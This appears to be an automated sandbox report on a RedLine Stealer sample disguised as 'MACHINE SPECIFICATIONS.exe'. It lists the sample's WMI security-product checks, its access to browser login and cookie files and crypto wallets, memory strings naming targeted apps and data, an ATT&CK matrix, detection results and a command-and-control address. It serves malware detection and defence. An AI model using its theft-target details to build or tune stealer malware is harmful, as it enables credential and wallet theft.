Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Source: MACHINE SPECIFICATIONS.exe, 00000003.00000003.353796939.000000000648D000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.368625492.000000000648E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000003.353796939.000000000648D000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.368625492.000000000648E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 492, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.282869112.0000000003971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDERB485143E

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match	File source: 3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 492, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 492, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	Path Interception	11 Process Injection	11 Masquerading	1 OS Credential Dumping	331 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Users	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Obfuscated Files or Information	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MACHINE SPECIFICATIONS.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
MACHINE SPECIFICATIONS.exe	100%	Avira	HEUR/AGEN.1222388

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.0.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.12.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1216612	Download File
3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack	100%	Avira	HEUR/AGEN.1216612	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.6.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
0.0.MACHINE SPECIFICATIONS.exe.100000.0.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1216612	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.4.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.2.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.10.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1216612	Download File
3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack	100%	Avira	HEUR/AGEN.1216612	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.1.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.100000.3.unpack	100%	Avira	HEUR/AGEN.1222388	Download File
3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1216612	Download File

Domains

Source	Detection	Scanner	Label	Link
api.ip.sb	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://service.r	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	URL Reputation	safe
http://tempuri.org/t_	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdates	0%	URL Reputation	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://185.222.58.90:17910	0%	Virustotal		Browse
http://185.222.58.90:17910	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	URL Reputation	safe
http://tempuri.org/0	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://helpx.ad	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnviron	0%	URL Reputation	safe
https://get.adob	0%	URL Reputation	safe
http://185.222.58.90:1	0%	Avira URL Cloud	safe
http://185.222.58.90:17910/	0%	Avira URL Cloud	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.222.58.90:17910/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
http://service.r	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
